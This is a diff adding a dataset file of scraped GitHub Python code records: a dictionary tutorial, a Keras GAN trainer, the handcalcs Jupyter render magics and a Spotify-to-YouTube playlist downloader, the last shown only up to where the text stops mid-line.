diff --git "a/4553.jsonl" "b/4553.jsonl" new file mode 100644--- /dev/null +++ "b/4553.jsonl" @@ -0,0 +1,768 @@ +{"seq_id":"39067630551","text":"# Dictionary\nx, y, z = {'car': 45, 1: 'new', 'carbon': 32}\n\n# homer = 'never'\n# x = {'never': 'ever'}\nprint(type(y))\nnew_type = str(y)\nprint(new_type)\nprint(type(new_type))\n\ndictionary_items = {\n 'a': [1, 5, 6],\n 'b': 2,\n 'c': 3\n}\nprint(dictionary_items['a'][1])\n\nnew_list = [\n {\n 'a': [1, 5, 6],\n 'b': 2,\n 'c': 3\n },\n {\n 'f': [6, 2, 0],\n 'k': 2,\n 'l': 3\n }\n]\nprint(new_list[1])\nprint(new_list[1]['f'])\nprint(new_list[1]['f'][0])\n\n# Use the get method in order to find values from keys in a dictionary so it doesn't break the rest of the code execution\nprint(new_list[0].get('a', 'The value doesnt exist'))\n\nuser = {\n 'basket': [1, 3, 4],\n 'greet': 'jello',\n 'age': 30\n}\n\nprint('basket' in user)\nprint('size' in user)\nprint(user.update({'age': 55}))\nprint(user)","repo_name":"HamzahHal/Advanced_Python","sub_path":"Dictionary.py","file_name":"Dictionary.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2384993745","text":"from keras.models import Sequential, Model\nfrom keras.layers import Input, Dense, Dropout, Activation, \\\n Flatten, LeakyReLU, BatchNormalization, Conv2DTranspose, Conv2D,MaxPooling2D, Reshape\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D\nfrom keras.optimizers import Adam, RMSprop,SGD\nfrom keras.initializers import RandomNormal\nfrom keras.models import load_model\nimport numpy as np\nimport Divers\nimport matplotlib.pyplot as plt\nimport copy\nimport time\n\n\ndef generator_8x8(input_gen=20, leaky_alpha=0.2,dropRate=0.3,output_img=(8,8,3)):\n model = Sequential()\n\n model.add(Dense(32*2*2,input_dim=input_gen, name=\"Dens1_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(32 * 2 * 2, name=\"Dens2_generator_8x8\"))\n model.add(Dropout(dropRate))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((2, 2, 32), input_shape=(32 * 2 * 2,)))\n\n model.add(Conv2DTranspose(64, kernel_size=(3,3), strides=(2,2),padding='same', name=\"ConvTransp1_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(64, kernel_size=(3,3), padding='same', strides=(1,1), name=\"Conv1_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n\n model.add(Conv2DTranspose(128, kernel_size=(3,3), strides=(2,2),padding='same', name=\"ConvTransp2_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(128, kernel_size=(3,3), padding='same', strides=(1,1), name=\"Conv2_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n \n model.add(Conv2D(3, kernel_size=(3,3), padding='same', activation='tanh', strides=(1,1), name=\"Conv3_generator_8x8\"))\n \n model.summary()\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef generator_16x16(input_gen=20, leaky_alpha=0.2,dropRate=0.3,output_img=(16,16,3)):\n model = Sequential()\n\n model.add(Conv2DTranspose(256, kernel_size=(3,3), strides=(2,2),padding='same', name=\"convTransp1_generator_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n 
model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(256, kernel_size=(3,3), padding='same', strides=(1,1), name=\"conv1_generator_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(256, kernel_size=(3,3), padding='same', strides=(1,1), name=\"conv2_generator_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n \n model.add(Conv2D(3, kernel_size=(3,3), padding='same', activation='tanh', strides=(1,1), name=\"conv3_generator_16x16\"))\n \n #model.summary()\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef discriminator_16x16(leaky_alpha=0.2, dropRate=0.3, image_shape=(16,16,3), output_dim=(8,8,3)):\n model = Sequential()\n \n model.add(Conv2D(512, (3, 3),padding='same',input_shape=image_shape, strides=(1,1), name=\"conv1_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(512, (3, 3), strides=(1,1),padding='same', name=\"conv2_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(256, (3, 3), strides=(1,1),padding='same', name=\"conv3_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(256, (3, 3), strides=(1,1),padding='same', name=\"conv4_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n\n #Pour coordonner les 2 models\n model.add(Conv2D(3, (3, 3), strides=(1,1),padding='same', name=\"conv5_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n\n model.summary()\n sgd=SGD(lr=0.0002)\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef discriminator_8x8(leaky_alpha=0.2, dropRate=0.3, image_shape=(8,8,3)):\n model = Sequential()\n \n model.add(Conv2D(64, (3, 3),padding='same',input_shape=image_shape, strides=(1,1), name=\"conv1_discri_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(64, (3, 3), strides=(1,1),padding='same', name=\"conv2_discri_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(128, (3, 3), strides=(1,1),padding='same', name=\"conv3_discri_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(128, (3, 3), strides=(1,1),padding='same', name=\"conv4_discri_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten())\n model.add(Dense(128, name=\"Dens1_discri_8x8\"))\n model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n\n model.add(Dense(1, name=\"Dens2_discri_8x8\"))\n model.add(Activation('sigmoid'))\n model.summary()\n sgd=SGD(lr=0.0002)\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef DCGAN(input_gen,dataset):\n # generator\n #g_1 = generator_model(sample_size, 0.2)\n #On load le generator_1\n #g_1.load_weights('g.h5')\n #g_2 = generator_model_part1(sample_size, 0.2)\n #On ajoute la seconde partie\n #g = Sequential([g_1,g_2])\n\n #g.summary()\n g_8x8 = generator_8x8(input_gen,0.2)#generatorV1_model(input_gen, 0.2)\n g_8x8.load_weights('g.h5')\n g_16x16 = generator_16x16()\n g = 
Sequential([g_8x8, g_16x16])\n sgd=SGD()\n g.compile(optimizer=Adam(lr=0.0001, beta_1=0.5), loss='binary_crossentropy',metrics=['accuracy'])\n # discriminator\n d_8x8 = discriminator_8x8()\n d_8x8.load_weights('d.h5')\n d_16x16 = discriminator_16x16()\n #d.load_weights('d.h5')\n d_8x8.trainable = False\n d_16x16.trainable = False\n d = Sequential([d_16x16,d_8x8])\n sgd=SGD()\n d.compile(optimizer=Adam(lr=0.0001, beta_1=0.5), loss='binary_crossentropy',metrics=['accuracy'])\n # GAN\n gan = Sequential([g, d])\n gan.summary()\n sgd=SGD()\n gan.compile(optimizer=Adam(lr=0.0001, beta_1=0.5), loss='binary_crossentropy',metrics=['accuracy'])\n return gan, g, d\n\n\ndef generatorV1_model(input_gen=20, leaky_alpha=0.2,dropRate=0.3):\n model = Sequential()\n\n model.add(Dense(input_dim=input_gen, output_dim=2048))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(32 * 8 * 8))\n model.add(Dropout(dropRate))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((8, 8, 32), input_shape=(32 * 8 * 8,)))\n #model.add(UpSampling2D(size=(2, 2)))\n model.add(Conv2DTranspose(64, kernel_size=(3,3), strides=(2,2),padding='same'))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(64, kernel_size=(3,3), padding='same', strides=(1,1)))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(UpSampling2D(size=(2, 2)))\n model.add(Conv2DTranspose(128, kernel_size=(3,3), strides=(2,2),padding='same'))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(128, kernel_size=(3,3), padding='same', strides=(1,1)))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(UpSampling2D(size=(2, 2)))\n \n model.add(Conv2DTranspose(256, kernel_size=(4,4), strides=(2,2),padding='same'))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(256, kernel_size=(3,3), padding='same', strides=(1,1)))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(3, kernel_size=(4,4), padding='same', activation='tanh', strides=(1,1)))\n #model.add(LeakyReLU(alpha=0.2)) \n\n model.summary()\n model.compile(loss='mean_squared_error', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\n#def discriminatorV1_model(leaky_alpha=0.2, dropRate=0.3, image_shape=(64,64,3)):\n# model = Sequential()\n \n# # layer1 (None,64,64,3)>>(None,32,32,32)\n# model.add(Conv2D(16, kernel_size=3, strides=2, input_shape=image_shape, padding=\"same\"))\n# model.add(LeakyReLU(alpha=leaky_alpha))\n\ndef generator_model_part1(dropRate=0.3, leaky_alpha=0.2):\n model = Sequential()\n\n\n # (None,16,16,128)>>(None,32,32,256)\n model.add(Conv2D(64, kernel_size=(2,2), padding=\"same\",input_shape=(64,64,3)))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n model.add(Dropout(dropRate))\n\n model.add(Conv2D(64, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n model.add(Dropout(dropRate))\n\n #(None,32,32,256)>>(None,32,32,256)\n model.add(Conv2D(3, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n 
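# Sigmoid squashes the 3-channel output into [0, 1] (the other generators in this file end with tanh in [-1, 1]).\n    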
model.add(Activation(\"sigmoid\")) \n \n model.summary()\n \n \n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\n\ndef generator_model(nbrParamEntree=10, dropRate=0.3, leaky_alpha=0.2):\n model = Sequential()\n \n model.add(Dense(64*64*3, input_shape=(nbrParamEntree,)))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n\n # (None,16*16*128)>>(None,16,16,128)\n model.add(Reshape((64, 64, 3)))\n\n \n # (None,16,16,128)>>(None,32,32,256)\n model.add(Conv2D(128, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n model.add(Dropout(dropRate))\n\n model.add(Conv2D(128, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n model.add(Dropout(dropRate))\n\n #(None,32,32,256)>>(None,32,32,256)\n model.add(Conv2D(3, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"sigmoid\")) \n \n model.summary()\n \n \n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef discriminator_model(leaky_alpha=0.2, dropRate=0.3, image_shape=(32,32,3)):\n model = Sequential()\n \n # layer1 (None,64,64,3)>>(None,32,32,32)\n model.add(Conv2D(64, (3, 3),\n padding='same',\n input_shape=(64, 64, 3), strides=(1,1)))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n\n model.add(Conv2D(64, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(128, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(Conv2D(128, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(256, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(Conv2D(256, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n #model.add(BatchNormalization(momentum=0.8))\n\n #model.add(Dropout(dropRate))\n model.add(Conv2D(512, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n #model.add(BatchNormalization(momentum=0.8))\n\n model.add(Flatten())\n model.add(Dense(256))\n model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n \n #model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(dropRate))\n\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n model.summary()\n sgd=SGD(lr=0.0002)\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['binary_accuracy'])\n return model\n\ndef entrainement(epochs, nbrImageEntrainement, datasetImg, ChargeSauvegarde, epoch_start,pasEntrainement,input_gen,nbrColImgGen,nbrLigneColImgGen,epoch_report):\n #On crée le GAN\n (gan, g, d) = DCGAN(input_gen,datasetImg)\n\n if(ChargeSauvegarde == True):\n gan.load_weights('GAN.h5')\n g.load_weights('g.h5')\n d.load_weights('d.h5')\n\n #On doit entraîner un peu le discriminateur\n if(epoch_start == 0):\n d.trainable = True\n 
d.fit(datasetImg[0:nbrImageEntrainement],np.ones(nbrImageEntrainement),epochs=5)\n d.trainable = False\n\n\n #On se prépare un vecteur de bruit fixe pour pouvoir voir l'évolution de ce vecteur\n bruitFixe = np.random.rand(nbrColImgGen*nbrLigneColImgGen,input_gen)\n\n moyaccDiscriTrueImageArray = []\n moyAccGANArray = []\n moyaccDiscriFalseImageArray = []\n\n moyLossDiscriTrueImageArray = []\n moyLossGANArray = []\n moyLossDiscriFalseImageArray = []\n\n #On init la variable de stockage d'image\n imgGenereNonCalib = np.ndarray(shape=(nbrColImgGen*nbrLigneColImgGen, datasetImg.shape[1],datasetImg.shape[2],3),\n dtype=np.float32)\n\n genImage = []\n\n for e in range(epoch_start,epochs):\n\n moyaccDiscriTrueImage = 0.0\n moyaccDiscriFalseImage = 0.0\n moyAccGAN = 0.0\n\n moyLossDiscriTrueImage = 0.0\n moyLossDiscriFalseImage = 0.0\n moyLossGAN = 0.0\n\n #On init le start time\n start_time = time.clock()\n\n for a in range(0,nbrImageEntrainement,pasEntrainement):\n\n temps_restant = (float(nbrImageEntrainement - a) * (time.clock() - start_time) )\n temps_restant_formate = time.strftime('%H:%M:%S', time.gmtime(temps_restant))\n print(\"Epochs \" + str(e) + \"/\" + str(epochs) + \" image : \" + str(a) + \"/\" + str(nbrImageEntrainement) + \n \" temps restant = \" + temps_restant_formate, end=\"\\r\")\n\n #On démarre le chrono\n start_time = time.clock()\n\n bruit = np.random.rand(pasEntrainement,input_gen)\n #On génère l'image à partir du bruit\n genImage = g.predict(bruit)\n\n #On entraîne le discriminateur\n d.trainable = True\n discriTrueImage = d.fit(datasetImg[a:a+pasEntrainement], np.ones(pasEntrainement),verbose=0)\n discriFalseImage = d.fit(genImage, np.zeros(pasEntrainement),verbose=0)\n d.trainable = False\n #On entraîne le generateur\n ganHistoryImg = gan.fit(bruit, np.ones(pasEntrainement),verbose=0)\n \n moyaccDiscriTrueImage = moyaccDiscriTrueImage + (discriTrueImage.history['acc'][0])\n moyaccDiscriFalseImage = moyaccDiscriFalseImage + (discriFalseImage.history['acc'][0])\n moyAccGAN = moyAccGAN + (ganHistoryImg.history['acc'][0])\n \n \n #Pareil pour le loss\n moyLossDiscriTrueImage = moyLossDiscriTrueImage + (discriTrueImage.history['loss'][0])\n moyLossDiscriFalseImage = moyLossDiscriFalseImage + (discriFalseImage.history['loss'][0])\n moyLossGAN = moyLossGAN + (ganHistoryImg.history['loss'][0])\n \n \n if ( (a % epoch_report == 0) & (a != 0) ):\n\n epoch_temp = (a / nbrImageEntrainement) + e\n\n moyaccDiscriTrueImage = moyaccDiscriTrueImage / epoch_report\n moyAccGAN = moyAccGAN / epoch_report\n moyaccDiscriFalseImage = moyaccDiscriFalseImage / epoch_report\n moyLossDiscriTrueImage = moyLossDiscriTrueImage / epoch_report\n moyLossGAN = moyLossGAN / epoch_report\n moyLossDiscriFalseImage = moyLossDiscriFalseImage / epoch_report\n\n #On fait la moyenne de l'acc\n moyaccDiscriTrueImageArray.append([epoch_temp, moyaccDiscriTrueImage])\n moyAccGANArray.append([epoch_temp,moyAccGAN])\n moyaccDiscriFalseImageArray.append([epoch_temp, moyaccDiscriFalseImage])\n #Pareil pour le loss\n moyLossDiscriTrueImageArray.append([epoch_temp, moyLossDiscriTrueImage])\n moyLossGANArray.append([epoch_temp,moyLossGAN])\n moyLossDiscriFalseImageArray.append([epoch_temp, moyLossDiscriFalseImage])\n \n if( e >= 1):\n #Sauvegarde\n gan.save_weights('GAN.h5')\n g.save_weights('g.h5')\n d.save_weights('d.h5')\n\n #On enregistre les perfs du GAN acc\n Divers.SauvegardePerfGAN(epoch_temp,np.array(moyaccDiscriTrueImageArray),np.array(moyAccGANArray),np.array(moyaccDiscriFalseImageArray),\"AccGAN\")\n\n #On 
enregistre les perfs du GAN loss\n Divers.SauvegardePerfGAN(epoch_temp,np.array(moyLossDiscriTrueImageArray),np.array(moyLossGANArray),np.array(moyLossDiscriFalseImageArray),\"LossGAN\") \n\n\n bruit = np.random.rand((nbrColImgGen*nbrLigneColImgGen),input_gen)\n #On génère l'image à partir du bruit\n genImage = g.predict(bruit)\n imgGenereNonCalib = copy.copy(genImage)\n imgGenerePrAffichage = Divers.UndoCalibrationValeurPixelDataset(imgGenereNonCalib)\n\n #On enregistre l'image générée\n Divers.SauvegardeImageMatplot(nbrColImgGen,nbrLigneColImgGen,imgGenerePrAffichage,\"Resultat/ImageGenerees/epochs_\" + str(epoch_temp) + \".png\")\n #On enregistre les images générées avec le bruit fixe\n \n #On génère l'image à partir du bruit\n genImage = g.predict(bruitFixe)\n imgGenereNonCalib = copy.copy(genImage)\n imgGenerePrAffichage = Divers.UndoCalibrationValeurPixelDataset(imgGenereNonCalib)\n Divers.SauvegardeImageMatplot(nbrColImgGen,nbrLigneColImgGen,imgGenerePrAffichage,\"Resultat/ImageGenerees/bruitFixe/epochs_\" + str(epoch_temp) + \".png\")\n\n #Si le discriminateur se trompe plus de la moitié du temps on arrete\n if(moyLossDiscriTrueImage >= 0.5):\n print(\"FIN entrainement !\")\n return\n\ndef afficheMeilleurImageGAN(nombreImg,nbrColonne,nbrLigne,nomFichier,input_gen,pourcentage_reussite):\n\n bruit = np.random.rand(nombreImg+1,input_gen)\n\n #On init la variable de stockage d'image\n dataset = np.ndarray(shape=(nbrColonne*nbrLigne, 64,64,3),\n dtype=np.float32)\n\n #On crée le GAN\n (gan, g, d) = DCGAN(input_gen,dataset)\n\n gan.load_weights('GAN.h5')\n g.load_weights('g.h5')\n d.load_weights('d.h5')\n\n imgListe = g.predict(bruit)\n pourcentageReussite = gan.predict(bruit)\n\n i=0\n index = 0\n while(i < ((nbrColonne*nbrLigne)-2) | index < nombreImg):\n print(\"Images trouvés : \" + str(i) + \" / \" + str(nbrColonne*nbrLigne) + \" Image parcourue : \" + str(index) + \" / \" + str(nombreImg), end=\"\\r\")\n \n if pourcentageReussite[index] > pourcentage_reussite:\n if i < (nbrColonne*nbrLigne) :\n dataset[i] = imgListe[index]\n i+=1\n index+=1\n dataset = Divers.UndoCalibrationValeurPixelDataset(dataset)\n\n Divers.SauvegardeImageMatplot(nbrColonne,nbrLigne,dataset,\"Resultat/\"+nomFichier)\n\n\n\n","repo_name":"Dapawan/Test_GAN","sub_path":"GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":20302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15594771365","text":"import sys\nfrom . import handcalcs as hand\nfrom . 
import sympy_kit as s_kit\n\ntry:\n from IPython.core.magic import (\n Magics,\n magics_class,\n cell_magic,\n register_cell_magic,\n register_line_magic,\n )\n from IPython import get_ipython\n from IPython.display import Latex, Markdown, display\n from IPython.utils.capture import capture_output\nexcept ImportError:\n pass\n\n\ntry:\n ip = get_ipython()\n cell_capture = capture_output(stdout=True, stderr=True, display=True)\nexcept AttributeError:\n raise ImportError(\n \"handcalcs.render is intended for a Jupyter environment.\"\n \" Use 'from handcalcs import handcalc' for the decorator interface.\"\n )\n\n\ndef parse_line_args(line: str) -> dict:\n \"\"\"\n Returns a dict that represents the validated arguments\n passed in as a line on the %%render or %%tex cell magics.\n \"\"\"\n valid_args = [\"params\", \"long\", \"short\", \"sympy\", \"symbolic\", \"_testing\"]\n # valid_args = [\"params\", \"long\", \"short\", \"sympy\", \"symbolic\", \"_testing\"]\n sympy_arg = [\"sympy\"]\n line_parts = line.split()\n parsed_args = {\"override\": \"\", \"precision\": None, \"sympy\": False, \"sci_not\": None}\n # parsed_args = {\n # \"override\": \"\",\n # \"precision\": \"\",\n # }\n precision = \"\"\n for arg in line_parts:\n if arg.lower() in sympy_arg:\n parsed_args[\"sympy\"] = True\n continue\n if arg.lower() == \"sci_not\":\n parsed_args[\"sci_not\"] = True\n for valid_arg in valid_args:\n if arg.lower() in valid_arg:\n parsed_args.update({\"override\": valid_arg})\n break\n try:\n precision = int(arg)\n except ValueError:\n pass\n if precision or precision == 0:\n parsed_args.update({\"precision\": precision})\n return parsed_args\n\n\n@register_line_magic\ndef decimal_separator(line):\n if len(line) == 1:\n hand.LatexRenderer.dec_sep = line\n\n\n@register_cell_magic\ndef render(line, cell):\n # Retrieve var dict from user namespace\n user_ns_prerun = ip.user_ns\n line_args = parse_line_args(line)\n\n if line_args[\"sympy\"]:\n cell = s_kit.convert_sympy_cell_to_py_cell(cell, user_ns_prerun)\n\n # Run the cell\n with cell_capture:\n exec_result = ip.run_cell(cell)\n\n if not exec_result.success:\n return None\n\n # Retrieve updated variables (after .run_cell(cell))\n user_ns_postrun = ip.user_ns\n\n # Do the handcalc conversion\n renderer = hand.LatexRenderer(cell, user_ns_postrun, line_args)\n latex_code = renderer.render()\n\n # Display, but not as an \"output\"\n display(Latex(latex_code))\n\n if line_args[\"override\"] == \"_testing\":\n return latex_code\n\n\n@register_cell_magic\ndef tex(line, cell):\n # Retrieve var dict from user namespace\n user_ns_prerun = ip.user_ns\n line_args = parse_line_args(line)\n\n if line_args[\"sympy\"]:\n cell = s_kit.convert_sympy_cell_to_py_cell(cell, user_ns_prerun)\n\n # Run the cell\n with cell_capture:\n exec_result = ip.run_cell(cell)\n\n if not exec_result.success:\n return None\n\n # Retrieve updated variables (after .run_cell(cell))\n user_ns_postrun = ip.user_ns\n\n # Do the handcalc conversion\n renderer = hand.LatexRenderer(cell, user_ns_postrun, line_args)\n latex_code = renderer.render()\n\n # Display, but not as an \"output\"\n print(latex_code)\n\n if line_args[\"override\"] == \"_testing\":\n return latex_code\n\n\ndef load_ipython_extension(ipython):\n \"\"\"This function is called when the extension is\n loaded. It accepts an IPython InteractiveShell\n instance. 
We can register the magic with the\n `register_magic_function` method of the shell\n instance.\"\"\"\n ipython.register_magic_function(render, \"cell\")\n\n\n# def unload_ipython_extension(ipython):\n# \"\"\"This function is called when the extension is\n# loaded. It accepts an IPython InteractiveShell\n# instance. We can register the magic with the\n# `register_magic_function` method of the shell\n# instance.\"\"\"\n# print(dir(ipython.magics_manager))\n# ipython.magics_manager.remove(render)\n","repo_name":"connorferster/handcalcs","sub_path":"handcalcs/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":5272,"dataset":"github-code","pt":"77"} +{"seq_id":"6056241189","text":"import shutil\nimport requests\nfrom googleapiclient.discovery import build\nfrom pytube import YouTube\nimport os\nimport base64\nimport webbrowser\n\ndef INITIALIZE_VARIABLES():\n #Spotify\n global client_id\n client_id = os.environ.get(\"CLIENT_ID\")\n\n global client_secret \n client_secret = os.environ.get(\"CLIENT_SECRET\")\n\n global base_64\n base_64 = Base64Encode(client_id, client_secret)\n\n #Youtube\n global api_key\n api_key = os.environ.get(\"API_KEY_YT\")\n global service_yt\n service_yt = build(\"youtube\", \"v3\", developerKey=api_key)\n\ndef Base64Encode(CLIENT_ID, CLIENT_SECRET):\n key = CLIENT_ID + \":\" + CLIENT_SECRET\n key_encoded_byte = base64.b64encode(key.encode(\"ascii\"))\n key_encoded = key_encoded_byte.decode(\"ascii\")\n return key_encoded\n\ndef Authorization():\n print(\"Connecting to Spotify...\")\n auth_query = \"https://accounts.spotify.com/api/token\"\n try:\n auth_res = requests.post(auth_query, data={\"grant_type\":\"client_credentials\"}, headers={\"Authorization\":\"Basic \" + base_64})\n access_token = auth_res.json()[\"access_token\"]\n print(\"Successfully Connected to Spotify\")\n return access_token\n except:\n print(\"Error Connecting to Spotify, Please Try Again Later\")\n print(\"----------The End----------\")\n quit()\n\ndef Get_Playlist_Songs(access_token):\n #playlist_link = \"https://open.spotify.com/playlist/63qp5ewWfM4aGrXWQ8rlrC?si=ab856c6055eb457a\"\n #playlist_link = \"https://open.spotify.com/playlist/1CFs9S4xEqd1zBY75rWNTN?si=19fd75c994174fb4\"\n #playlist_link = \"https://open.spotify.com/playlist/0yXlKEvlgpWJ5eNRth61El?si=a24bd19e75884bdf\"\n playlist_link = input()\n\n playlist_id = playlist_link[34:56]\n \n print(\"Getting Data from Playlist...\")\n\n offset = 0\n songs = {\"name\":\"\", \"num_of_songs\":0, \"song\":[], \"artists\":[]}\n try:\n while True:\n playlist_query = \"https://api.spotify.com/v1/playlists/{}?fields=name\".format(playlist_id)\n playlist_items_query = \"https://api.spotify.com/v1/playlists/{}/tracks?limit=100&offset={}\".format(playlist_id, offset * 100)\n\n playlist_res = requests.get(playlist_query, headers={\"Authorization\":\"Bearer \" + access_token})\n playlist_items_res = requests.get(playlist_items_query, headers={\"Authorization\":\"Bearer \"+ access_token})\n\n playlist_name = playlist_res.json()[\"name\"]\n\n res_json = playlist_items_res.json()\n num_of_songs = len(playlist_items_res.json()[\"items\"]) \n\n songs[\"name\"] = playlist_name\n songs[\"num_of_songs\"] = num_of_songs \n for i in range(num_of_songs):\n x = 0\n artists = []\n while True:\n try:\n artists.append(res_json[\"items\"][i][\"track\"][\"artists\"][x][\"name\"])\n x += 1\n except:\n break\n songs[\"artists\"].append(artists)\n 
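# Keep the track title at the same index as its artist list so the two stay paired.\n            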
songs[\"song\"].append(playlist_items_res.json()[\"items\"][i][\"track\"][\"name\"])\n if num_of_songs < 100:\n break\n else:\n offset += 1\n except:\n print(\"Error Connecting to Playlist\")\n print(\"----------The End----------\")\n quit()\n\n print(\"Playlist Data Successfully Obtained\")\n return songs\n\ndef Display_Playlist(playlist):\n for i in range(playlist[\"num_of_songs\"]):\n print(\"{:>4}.\".format(i+1), playlist[\"song\"][i], \"-\", playlist[\"artists\"][i])\n\ndef Youtube(playlist_data):\n playlist_name = playlist_data[\"name\"]\n path = os.path.expanduser(\"~\\\\Music\\\\\" + playlist_name) \n\n print(\"Creating Playlist Folder for '\" + playlist_name + \"'\")\n\n if (os.path.isdir(path)):\n shutil.rmtree(path)\n \"\"\" print(\"Playlist already exists\")\n print(\"----------The End----------\")\n quit() \"\"\"\n else:\n os.mkdir(path)\n \n num_of_songs = playlist_data[\"num_of_songs\"]\n \n for i in range(num_of_songs):\n song_name = playlist_data[\"song\"][i]\n song_artists = playlist_data[\"artists\"][i]\n yt_req = service_yt.search().list(part=\"snippet\", q=\"{} {} audio\".format(song_name, song_artists[0]), type=\"video\", maxResults=1)\n res = yt_req.execute()\n vid_id = res[\"items\"][0][\"id\"][\"videoId\"]\n yt = 